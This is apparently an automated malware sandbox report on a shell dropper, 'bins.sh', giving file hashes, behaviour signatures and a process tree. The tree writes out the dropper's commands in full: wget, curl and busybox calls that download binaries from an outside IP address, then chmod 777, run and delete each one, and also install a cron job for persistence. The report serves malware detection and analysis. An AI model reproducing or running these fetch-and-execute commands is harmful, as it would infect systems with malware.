Analysis
- max time kernel: 21s
- max time network: 37s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 26-10-2024 22:42
Static task
- static1
Behavioral tasks
- behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
- behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample bins.sh, resource debian9-mipsel-20240226-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 788455780ea094018314d177b06bc6c7
- SHA1: fed4c714293cf21d947da11f6557ae8cce17071e
- SHA256: 5b5aa6bdfc62a9584cda1474c4efc2a79fdc2884dead583f0d69a48f6ec3f0ae
- SHA512: 1de55f8859f0485b63139e06e216a92450efe26dc5d88c1b20519fc913c8eade2688731866a4d8756a4f72f6af8dd04d20283815939fbd6844727991d31c4c9a
- SSDEEP: 96:FaR6l656DwojG1uGROuSbaqI0R0bR6l656Dwol7UVG1uGR25uSbaqbJYTBCTbIH:FaMI0DwopuSbaqI0R0YI0DwowuSbaqo
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTPs, 13 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
- 804 chmod
- 817 chmod
- 836 chmod
- 842 chmod
- 692 chmod
- 761 chmod
- 791 chmod
- 775 chmod
- 824 chmod
- 830 chmod
- 674 chmod
- 712 chmod
- 732 chmod
-
Executes dropped EXE (13 IoCs)
Processes (path, pid, process):
- /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge (pid 675, process ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge)
- /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 (pid 693, process QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1)
- /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd (pid 713, process KnTTDDsvNxSydYgPidAurYS9baJBODz0rd)
- /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte (pid 734, process lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /tmp/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5 (pid 763, process pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5)
- /tmp/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A (pid 777, process 7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A)
- /tmp/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe (pid 792, process pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe)
- /tmp/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E (pid 806, process iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E)
- /tmp/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc (pid 818, process 4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc)
- /tmp/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F (pid 825, process UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F)
- /tmp/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2 (pid 831, process TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2)
- /tmp/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA (pid 837, process oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA)
- /tmp/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv (pid 843, process RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv)
-
Renames itself (1 IoCs)
Processes (pid, process):
- 736 lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
-
Creates/modifies Cron job (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description, ioc, process):
- File opened for modification /var/spool/cron/crontabs/tmp.WoET3e (crontab)
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration (1 TTPs, 10 IoCs)
Checks CPU information that can indicate whether the system is a virtual machine.
Processes (description, ioc, process): 10 entries, each "File opened for reading /proc/cpuinfo" by curl
-
Reads runtime system information
Processes (ioc, process; every entry is "File opened for reading"):
- /proc/641/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/813/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/822/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/self/auxv (curl)
- /proc/590/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/776/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/sys/crypto/fips_enabled (curl)
- /proc/22/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/716/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/207/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/754/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/12/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/27/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/643/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/790/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/833/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/6/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/26/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/788/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/789/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/self/auxv (curl)
- /proc/sys/crypto/fips_enabled (curl)
- /proc/5/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/314/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/748/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/15/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/105/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/filesystems (crontab)
- /proc/42/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/146/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/585/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/784/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/785/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/sys/crypto/fips_enabled (curl)
- /proc/self/auxv (curl)
- /proc/835/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/267/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/782/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/797/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/834/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/self/auxv (curl)
- /proc/13/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/sys/crypto/fips_enabled (curl)
- /proc/800/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/3/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/300/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/640/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/648/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/19/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/24/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/7/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/96/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/758/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/767/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/768/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/filesystems (crontab)
- /proc/138/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/780/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/839/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/sys/crypto/fips_enabled (curl)
- /proc/18/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/751/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/783/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
- /proc/809/cmdline (lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte)
-
Writes file to tmp directory (21 IoCs)
Malware often drops required files in the /tmp directory.
Processes (ioc, process; every entry is "File opened for modification"):
- /tmp/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe (busybox)
- /tmp/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2 (busybox)
- /tmp/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv (busybox)
- /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 (busybox)
- /tmp/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A (busybox)
- /tmp/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E (busybox)
- /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge (curl)
- /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 (wget)
- /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd (curl)
- /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd (busybox)
- /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte (wget)
- /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte (busybox)
- /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge (busybox)
- /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 (curl)
- /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd (wget)
- /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte (curl)
- /tmp/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5 (busybox)
- /tmp/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc (busybox)
- /tmp/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F (busybox)
- /tmp/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA (busybox)
- /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge (wget)
Processes (nested by parent; format is "PID  image: command line", with the signatures each process triggered listed beneath it)
- PID 643  /tmp/bins.sh: /tmp/bins.sh
  - PID 645  /bin/rm: /bin/rm bins.sh
  - PID 647  /usr/bin/wget: wget http://87.120.126.196/bins/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge
    signatures: Writes file to tmp directory
  - PID 662  /usr/bin/curl: curl -O http://87.120.126.196/bins/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - PID 671  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge
    signatures: Writes file to tmp directory
  - PID 674  /bin/chmod: chmod 777 ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge
    signatures: File and Directory Permissions Modification
  - PID 675  /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge: ./ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge
    signatures: Executes dropped EXE
  - PID 677  /bin/rm: rm ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge
  - PID 678  /usr/bin/wget: wget http://87.120.126.196/bins/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1
    signatures: Writes file to tmp directory
  - PID 680  /usr/bin/curl: curl -O http://87.120.126.196/bins/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - PID 689  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1
    signatures: Writes file to tmp directory
  - PID 692  /bin/chmod: chmod 777 QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1
    signatures: File and Directory Permissions Modification
  - PID 693  /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1: ./QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1
    signatures: Executes dropped EXE
  - PID 695  /bin/rm: rm QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1
  - PID 697  /usr/bin/wget: wget http://87.120.126.196/bins/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd
    signatures: Writes file to tmp directory
  - PID 701  /usr/bin/curl: curl -O http://87.120.126.196/bins/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd
    signatures: Checks CPU configuration; Writes file to tmp directory
  - PID 708  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd
    signatures: Writes file to tmp directory
  - PID 712  /bin/chmod: chmod 777 KnTTDDsvNxSydYgPidAurYS9baJBODz0rd
    signatures: File and Directory Permissions Modification
  - PID 713  /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd: ./KnTTDDsvNxSydYgPidAurYS9baJBODz0rd
    signatures: Executes dropped EXE
  - PID 717  /bin/rm: rm KnTTDDsvNxSydYgPidAurYS9baJBODz0rd
  - PID 718  /usr/bin/wget: wget http://87.120.126.196/bins/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
    signatures: Writes file to tmp directory
  - PID 724  /usr/bin/curl: curl -O http://87.120.126.196/bins/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - PID 730  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
    signatures: Writes file to tmp directory
  - PID 732  /bin/chmod: chmod 777 lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
    signatures: File and Directory Permissions Modification
  - PID 734  /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte: ./lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
    signatures: Executes dropped EXE; Renames itself; Reads runtime system information
    - PID 737  /bin/sh: sh -c "crontab -l"
      - PID 738  /usr/bin/crontab: crontab -l
        signatures: Reads runtime system information
    - PID 742  /bin/sh: sh -c "crontab -"
      - PID 743  /usr/bin/crontab: crontab -
        signatures: Creates/modifies Cron job; Reads runtime system information
  - PID 751  /bin/rm: rm lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte
  - PID 756  /usr/bin/wget: wget http://87.120.126.196/bins/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5
  - PID 757  /usr/bin/curl: curl -O http://87.120.126.196/bins/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5
  - PID 758  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5
    signatures: Writes file to tmp directory
  - PID 761  /bin/chmod: chmod 777 pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5
    signatures: File and Directory Permissions Modification
  - PID 763  /tmp/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5: ./pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5
    signatures: Executes dropped EXE
  - PID 765  /bin/rm: rm pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5
  - PID 767  /usr/bin/wget: wget http://87.120.126.196/bins/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A
  - PID 768  /usr/bin/curl: curl -O http://87.120.126.196/bins/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A
    signatures: Checks CPU configuration; Reads runtime system information
  - PID 771  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A
    signatures: Writes file to tmp directory
  - PID 775  /bin/chmod: chmod 777 7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A
    signatures: File and Directory Permissions Modification
  - PID 777  /tmp/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A: ./7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A
    signatures: Executes dropped EXE
  - PID 779  /bin/rm: rm 7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A
  - PID 780  /usr/bin/wget: wget http://87.120.126.196/bins/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe
  - PID 784  /usr/bin/curl: curl -O http://87.120.126.196/bins/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe
    signatures: Checks CPU configuration
  - PID 787  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe
    signatures: Writes file to tmp directory
  - PID 791  /bin/chmod: chmod 777 pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe
    signatures: File and Directory Permissions Modification
  - PID 792  /tmp/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe: ./pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe
    signatures: Executes dropped EXE
  - PID 794  /bin/rm: rm pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe
  - PID 796  /usr/bin/wget: wget http://87.120.126.196/bins/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E
  - PID 798  /usr/bin/curl: curl -O http://87.120.126.196/bins/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E
  - PID 801  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E
    signatures: Writes file to tmp directory
  - PID 804  /bin/chmod: chmod 777 iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E
    signatures: File and Directory Permissions Modification
  - PID 806  /tmp/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E: ./iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E
    signatures: Executes dropped EXE
  - PID 809  /bin/rm: rm iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E
  - PID 810  /usr/bin/wget: wget http://87.120.126.196/bins/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc
  - PID 812  /usr/bin/curl: curl -O http://87.120.126.196/bins/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc
  - PID 815  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc
    signatures: Writes file to tmp directory
  - PID 817  /bin/chmod: chmod 777 4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc
    signatures: File and Directory Permissions Modification
  - PID 818  /tmp/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc: ./4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc
    signatures: Executes dropped EXE
  - PID 820  /bin/rm: rm 4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc
  - PID 821  /usr/bin/wget: wget http://87.120.126.196/bins/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F
  - PID 822  /usr/bin/curl: curl -O http://87.120.126.196/bins/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F
    signatures: Checks CPU configuration; Reads runtime system information
  - PID 823  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F
    signatures: Writes file to tmp directory
  - PID 824  /bin/chmod: chmod 777 UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F
    signatures: File and Directory Permissions Modification
  - PID 825  /tmp/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F: ./UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F
    signatures: Executes dropped EXE
  - PID 826  /bin/rm: rm UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F
  - PID 827  /usr/bin/wget: wget http://87.120.126.196/bins/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2
  - PID 828  /usr/bin/curl: curl -O http://87.120.126.196/bins/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2
    signatures: Checks CPU configuration
  - PID 829  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2
    signatures: Writes file to tmp directory
  - PID 830  /bin/chmod: chmod 777 TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2
    signatures: File and Directory Permissions Modification
  - PID 831  /tmp/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2: ./TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2
    signatures: Executes dropped EXE
  - PID 832  /bin/rm: rm TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2
  - PID 833  /usr/bin/wget: wget http://87.120.126.196/bins/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA
  - PID 834  /usr/bin/curl: curl -O http://87.120.126.196/bins/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA
    signatures: Checks CPU configuration
  - PID 835  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA
    signatures: Writes file to tmp directory
  - PID 836  /bin/chmod: chmod 777 oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA
    signatures: File and Directory Permissions Modification
  - PID 837  /tmp/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA: ./oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA
    signatures: Executes dropped EXE
  - PID 838  /bin/rm: rm oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA
  - PID 839  /usr/bin/wget: wget http://87.120.126.196/bins/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv
  - PID 840  /usr/bin/curl: curl -O http://87.120.126.196/bins/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv
    signatures: Checks CPU configuration; Reads runtime system information
  - PID 841  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv
    signatures: Writes file to tmp directory
  - PID 842  /bin/chmod: chmod 777 RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv
    signatures: File and Directory Permissions Modification
  - PID 843  /tmp/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv: ./RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv
    signatures: Executes dropped EXE
  - PID 845  /bin/rm: rm RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv
  - PID 846  /usr/bin/wget: wget http://87.120.126.196/bins/0FwIvrWL8fqJXFPAFZTKwj8B0WfoaotDBP
Network
MITRE ATT&CK Enterprise v15
Downloads